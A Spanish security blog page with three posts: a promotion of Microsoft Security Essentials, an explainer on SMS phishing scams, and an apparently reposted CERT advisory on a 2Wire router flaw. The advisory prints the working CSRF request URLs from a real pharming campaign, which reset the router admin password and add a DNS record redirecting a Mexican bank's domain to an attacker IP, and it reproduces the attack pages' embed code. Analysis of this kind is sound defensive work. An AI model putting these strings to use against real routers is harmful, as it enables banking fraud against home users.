Feeds:
Entradas
Comentarios

Posts Tagged ‘Vulnerabilidad’

Que tal cómo están?

Como sabrán el uso de las redes sociales cada día es más común entre nosotros y algo importante para todos es mantener la seguridad de la información y de nuestros equipos, es por eso, que desde el 1° de mayo Facebook, está ofreciendo la descarga de Microsoft Security Essentials de forma gratuita.

Esto, para tener más protegido nuestro equipo de las amenazas que existen en internet y en los sitios de las redes sociales, ya que en ocasiones nos llegan a mandar links para que ingresemos a ellos y no sabemos si lo que visitaremos es un sitio seguro, si bien, existen algunas otras configuraciones que podemos hacer para proteger nuestros equipos de las vulnerabilidades existentes, una muy importante es contar con un buen antivirus y, Microsoft Security Essentials, cuenta con una potente protección, así como, protección en tiempo real y scaneo sobre los documentos que descargamos de internet, cabe mencionar, que al ser una aplicación gratuita no está limitada en funcionalidades, es un producto muy complete.

Este producto está libre para su descarga en este sitio, puede ser instalada en todos los equipos que cuenten con licencia original de Windows 7, Windows Vista y/o Windows XP.

Esta aplicación es muy útil para mantener protegidos nuestros equipos caseros, ya que si quisiéramos instalar en equipos de la oficina para eso existe la solución de Forefront Endpoint Protection, esta es la solución de Antimalware para las empresas, ya que, cuenta con consola de administración para todos equipos, políticas y reportes centralizados.

Espero que esta información les sea de utilidad y sobre todo que descarguen Microsoft Security Essentials.

03-mse-robot

Anuncios

Read Full Post »

#SMiShing

Últimamente se ha estado mencionado el SMiShing el cual es el término que se le ha dado a un tipo de “Phishing” que se realiza por medio de ingeniería social empleado mensajes de texto dirigidos a los usuarios de Telefonía móvil.

El fraude es muy simple, una delincuente envía un mensaje de texto haciéndole creer al destinatario que ha sido el ganador de una buena suma de dinero o que ha realizado una compra costosa con la tarjeta de crédito (en realidad puede ser cualquier otra historia, pero estas son las más comunes) y le pide que se comunique con un teléfono que le proporciona, para hacer efectivo su premio.

En esta comunicación, la víctima es guiada paso a paso por medio de engaños a realizar alguna acción definida por su atacante, que puede ir desde transferencia de dinero, a traspaso de minutos, o robo de información para suplantar su identidad, en el siguiente vídeo, escucharemos como un periodista de La W Radio, se hace pasar por una supuesta víctima de este fraude y nos muestran cómo actúan los delincuentes.

http://vimeo.com/15563045

Otro audio gracias a juanalvarez9

Este audio ha sido tomado por @ocioweb para iniciar la campaña “Trollea por una Causa”, cuyo objetivo es hacer perderle el tiempo a los delincuentes, para que en ese tiempo no puedan engañar personas que aun desconocen de este tipo de fraudes y caen fácilmente en él.

http://crisfe.podomatic.com/entry/2010-07-08T11_08_28-07_00

Read Full Post »

Vulnerabilidad de autenticación en ruteadores 2Wire

Antecedentes

En los últimos días, el DSC/UNAM-CERT ha detectado la aparición de ataques web tipo pharming, enfocados a engañar a los usuarios víctimas para redirigirlos a sitios falsos de banca electrónica.

Las técnicas utilizadas en los ataques son Cross-site request forgery (XSRF) y Drive-by-pharming.

Cross-site request forgery (XSRF). Se trata de una técnica intrusiva también conocida como “one click attack” o “session riding”. El ataque se basa en la inclusión de un script malicioso en alguna página web o correo; la víctima, con el simple hecho de navegar por la página con el código insertado estaría realizando sin su conocimiento, actividades escondidas previamente establecidas por el atacante (por ejemplo, modificar una configuración de un router a través de la interfase web) .

Drive-by-pharming. Esta técnica consiste en la modificación de los registros para resolución de nombres (DNS) y busca redirigir las peticiones de conexión de un usuario hacia un sistema comprometido por un atacante. Una modalidad consiste en modificar el archivo “hosts” de los equipos de las víctimas, pero una variante más difícil de detectar consiste en alterar los registros de resolución de nombres de los ruteadores caseros de banda ancha (DSL). Este ataque realizado usualmente con tecnologías como JavaScript y flash intenta identificar la marca y dirección del ruteador casero para poder comprometerlo exitosamente.

En México recientemente se han comenzado a detectar vectores de infección que utilizan las dos técnicas, es decir, se inserta código FLASH en páginas web que al ser navegadas por la víctima insertan registros de DNS en el ruteador casero para redirigir al usuario hacia un sitio falso de banca electrónica.

Si bien los ataques de “drive by pharming” fueron documentados desde Diciembre de 2006, es hasta ahora que se han visto activamente explotados en México por los defraudadores.

Las vulnerabilidades en los equipos 2Wire fueron publicadas en Agosto de 2007, sin embargo a la fecha no existe una actualización de firmware que mitigue el problema.

Aunque las alertas de seguridad establecen como requisito una sesión activa de administrador o la configuración por default de equipos ruteadores de diversas marcas, hemos detectado que ciertos modelos de la marca 2Wire son vulnerables y no requieren una configuración por default, ya que la contraseña de administrador puede ser sobrescrita por medio de XSRF.

Análisis del ataque

El DSC/UNAM-CERT obtuvo un correo que se presentaba como una carta electrónica de felicitación de un sitio mexicano popular. El router probado fue un 2Wire 2701.

Al hacer clic en la liga, el usuario es redireccionado hacia un sitio web donde se abre un código FLASH que lleva a cabo el ataque XSRF.

<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash&quot;
name="index"
width="399" height="50"
s0rc="index.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>

Del archivo index.swf se obtienen las siguientes cadenas:

http://home/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://gateway.2wire.net/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.1.254/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://192.168.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=
http://172.16.0.1/xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

Aquí se pueden identificar los diversos intentos de llegar al ruteador para reestablecer la contraseña a “admin”. En el caso de nuestro equipo la URL que tuvo éxito fue la correspondiente a la IP 192.168.1.254.

Cabe señalar que el router contaba con una contraseña del sistema, establecida previamente, después de esta etapa del ataque la contraseña fue sobrescrita.

La página desde donde se sobrescribe la contraseña corresponde al wizard de configuración, por lo que al parecer el sistema no pide autenticación si se pasa como parámetro la nueva contraseña.

La URL del wizard de configuración:

xslt?PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=J38

Las variables de contraseña, confirmación y hint:

&PASSWORD=admin&PASSWORD_CONF=admin&HINT=

A continuación, la misma página espera 5 segundos para enviar la segunda parte del ataque, esto lo realiza a través del siguiente META:

<meta http-equiv="refresh" content="5;url=./postal.html" />

Los 5 segundos de espera tienen la finalidad de esperar a que la primera parte del ataque concluya el reseteo de la contraseña. Después de ese periodo se abre la página postal.html que incluye código para mostrar una animación auténtica y a la vez abrir otra animación FLASH:

<embed
type="application/x-shockwave-flash"
pluginspage="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash&quot;
name="banner"
width="743" height="87"
src="banner.swf"
bgcolor="#FFFFFF"
quality="high"
allowscriptaccess="samedomain"
>
<noembed>
</noembed>
</embed>
<embed
src="http://i.gusanito.com/g/gusanito/cards/4011/card.swf&quot; quality="high"
pluginspage="http://www.macromedia.com/shockwave/download/&quot;
type="application/x-shockwave-flash" width="550"
height="300"></embed>

El archivo banner.swf es el encargado de realizar la segunda parte del ataque y contiene las siguientes cadenas:

http://home/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://gateway.2wire.net/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95
http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38&NEXTPAGE=J38_SET&NAME=www.banamex.com&ADDR=65.111.185.95

 

En esta etapa se intentan agregar registros de resolución de nombres (DNS) a cada posible dirección donde se encuentra el router potencialmente (home, gateway.2wire.net, 192.168.1.254, 192.168.0.1, etc.), por lo que es posible que en una siguiente versión se llegue a automatizar este comportamiento.

Finalmente se puede verificar en el router comprometido que han sido agregados registros sin conocimiento del usuario:

Es importante destacar que todo el proceso es muy transparente para la víctima, ya que no se muestra actividad intrusiva evidente en el navegador y el antivirus no reporta anomalía alguna dado que no se descarga ningún binario.

Read Full Post »